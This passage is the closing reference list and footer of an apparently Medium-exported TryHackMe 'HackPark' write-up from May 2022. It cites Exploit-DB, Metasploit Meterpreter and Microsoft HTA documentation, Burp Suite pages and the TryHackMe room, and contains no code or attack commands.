data-href="https://www.exploit-db.com/exploits/46353" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://www.exploit-db.com/exploits/46353</a></p><p name="843a" id="843a" class="graf graf--p graf-after--p">Metasploit Unleashed (n.d.). <em class="markup--em markup--p-em">About the Metasploit Meterpreter</em>. Offensive Security. Retrieved on May 9, 2022 from: <a href="https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/" data-href="https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/</a></p><p name="7442" id="7442" class="graf graf--p graf-after--p">Microsoft Docs (2013). <em class="markup--em markup--p-em">HTA:APPLICATION Element | HTA:APPLICATION Object</em>. Retrieved on May 13, 2022 from: <a href="https://docs.microsoft.com/en-us/previous-versions/ms536495%28v=vs.85%29" data-href="https://docs.microsoft.com/en-us/previous-versions/ms536495(v=vs.85)" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://docs.microsoft.com/en-us/previous-versions/ms536495(v=vs.85)</a></p><p name="c164" id="c164" class="graf graf--p graf-after--p">PortSwigger (n.d.-a). <em class="markup--em markup--p-em">Burp Suite Community Edition</em>. Retrieved from May 8, 2022 from: <a href="https://portswigger.net/burp/communitydownload" data-href="https://portswigger.net/burp/communitydownload" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://portswigger.net/burp/communitydownload</a></p><p name="da55" id="da55" class="graf graf--p graf-after--p">PortSwigger (n.d.-b). <em class="markup--em markup--p-em">Attack Types [Burp Suite Intruder]</em>. Retrieved on May 8, 2022 from: <a href="https://portswigger.net/burp/documentation/desktop/tools/intruder/attack-types" data-href="https://portswigger.net/burp/documentation/desktop/tools/intruder/attack-types" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://portswigger.net/burp/documentation/desktop/tools/intruder/attack-types</a></p><p name="d832" id="d832" class="graf graf--p graf--startsWithDoubleQuote graf-after--p graf--trailing">“tryhackme” (2019). <em class="markup--em markup--p-em">HackPark</em>. TryHackMe. Retrieved from May 7, 2022 from: <a href="https://tryhackme.com/room/hackpark" data-href="https://tryhackme.com/room/hackpark" class="markup--anchor markup--p-anchor" rel="nofollow noopener" target="_blank">https://tryhackme.com/room/hackpark</a></p></div></div></section>
</section>
<footer><p>By <a href="https://medium.com/@EpsilonCalculus" class="p-author h-card">Aleksey</a> on <a href="https://medium.com/p/bd9c075c5262"><time class="dt-published" datetime="2022-05-25T08:53:58.183Z">May 25, 2022</time></a>.</p><p><a href="https://medium.com/@EpsilonCalculus/tryhackme-writeup-hackpark-bd9c075c5262" class="p-canonical">Canonical link</a></p><p>Exported from <a href="https://medium.com">Medium</a> on June 14, 2022.</p></footer></article></body></html>